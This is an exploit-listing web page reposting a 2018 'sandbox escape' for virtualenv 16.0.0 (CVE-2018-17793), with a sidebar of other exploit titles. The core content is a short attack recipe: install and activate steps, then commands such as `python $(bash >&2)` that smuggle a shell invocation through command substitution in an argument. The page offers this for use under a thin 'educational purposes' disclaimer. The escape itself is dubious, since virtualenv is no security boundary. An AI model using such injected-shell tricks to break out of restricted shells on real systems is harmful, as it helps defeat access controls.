Virtualenv 16.0.0 sandbox escape Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-10-04 | Type : local | Platform : linux
This exploit / vulnerability Virtualenv 16.0.0 sandbox escape is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: virtualenv 16.0.0 - Sandbox Escape
# Date: 2018-10-02
# Exploit Author: vr_system
# Vendor Homepage: https://virtualenv.pypa.io/en/stable/
# Software Link: https://virtualenv.pypa.io/en/stable/
# Version: 16.0.0
# Tested on: kali linux
# CVE : CVE-2018-17793

# 1 Install
# root@kali:~#pip install virtualenv
# root@kali:~#virtualenv test_env
# root@kali:~#cd test_env/
# root@kali:~/test_env#source ./bin/activate

# 2 Sandbox escape

(test_env) root@kali:~/test_env#python $(bash >&2)
(test_env) root@kali:~/test_env#python $(rbash >&2)

Virtualenv 16.0.0 sandbox escape


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Virtualenv 16.0.0 sandbox escape Vulnerability / Exploit